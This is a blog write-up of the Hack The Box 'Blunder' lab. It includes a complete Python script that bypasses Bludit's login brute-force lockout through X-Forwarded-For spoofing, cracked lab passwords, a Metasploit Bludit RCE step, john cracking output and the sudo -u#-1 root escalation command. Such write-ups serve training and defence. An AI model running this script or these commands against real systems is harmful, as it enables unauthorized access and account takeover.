[hackthebox]Blunder

blunder1

This is a linux machine that is rated easy, in fact it is only easy when I have gotten the correct parameters to exploit the CVEs.

NMAP

This machine unlike other Linux HTB machines do not have ssh, it only has http service opened.
nmap -sV -sC -vvv -oN blunder 10.10.10.191

Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-06-01 15:58:17 +08 for 29s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT   STATE  SERVICE REASON       VERSION
21/tcp closed ftp     conn-refused
80/tcp open   http    syn-ack      Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  1 15:58:46 2020 -- 1 IP address (1 host up) scanned in 30.34 seconds

Looking at the web

blunder2
This is a static page and there is not much interesting at first glance.

Doing web enumeration with gobuster, I have found that there is a todo.txt.

gobuster dir -u http://10.10.10.191 -x .php,.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o ~/htb/blunder/go3 --timeout 60s -t 30

blunder3

Apart from this text file, there is an admin directory which is a login page.
blunder4

From the todo.txt, a username – fergus – is found.

The password is within the main page, for this I used cewl -d 2 -m 5 -w dict.txt http://10.10.10.191/ to help me generate a wordlist.

Bludit has a lockout feature which “prevents” bruteforcing, from the web I have found a python script which can be used to bypass the bruteforce protection.

Finding fergus password for bludit

This is the modified python code which is used for Blunder.

#!/usr/bin/env python3
# https://rastating.github.io/bludit-brute-force-mitigation-bypass/
import re
import requests

filepath = "/home/cyruslab/htb/blunder/dict.txt"
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
with open(filepath, "r") as f:
wordlist = f.read().split("\n")

for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

print('[*] Trying: {p}'.format(p=password))

headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}

data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}

login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u=username, p=password))
print()
break

Running the script found a password matched for fergus.

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

Exploit bludit

With the username and password, I am using metasploit’s module to exploit bludit version 3.9.2 vulnerability.
The version of bludit was revealed when enumerating and testing with burpsuite.
blunder5

By using searchsploit the exploit can be located.
blunder6

The module to exploit bludit 3.9.2 is also available in my metasploit version.
blunder7

set the username and password and bludit’s ip address the exploit is executed successfully:
blunder8

Get the user flag

First of all I am upgrading the shell to /bin/bash.
blunder9

There are two users’ home directories:
blunder10

the user flag exists in hugo directory, hence the first step is to find hugo’s password.
blunder11

Searching the server I have found the password hash of hugo in users.php under this directory /var/www/bludit-3.10.0a/bl-content/databases.

With john the hash was cracked and password of hugo was found to be Password120.

$john -rules --wordlist=/usr/share/wordlists/rockyou.txt hugo.hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Password120      (?)
1g 0:00:00:02 DONE (2020-06-02 18:46) 0.3745g/s 6238Kp/s 6238Kc/s 6238KC/s Password125..Password1122
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Change user to hugo and the user flag is obtained.
blunder13

Privilege escalation to root

Hugo’s sudo privilege:
blunder14

This configuration has a vulnerability which can be exploited.

By running /bin/bash as sudo user #-1 the root is obtained.
sudo -u#-1 /bin/bash -i
blunder15

Other discovery

There are two screenshots found in shaun home folder.
sudo -u shaun /bin/bash -i, assumed as shaun
blunder16

One of the two screenshots looked interesting but it is a rabbithole, because the root.txt is always randomized.
blunder17

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s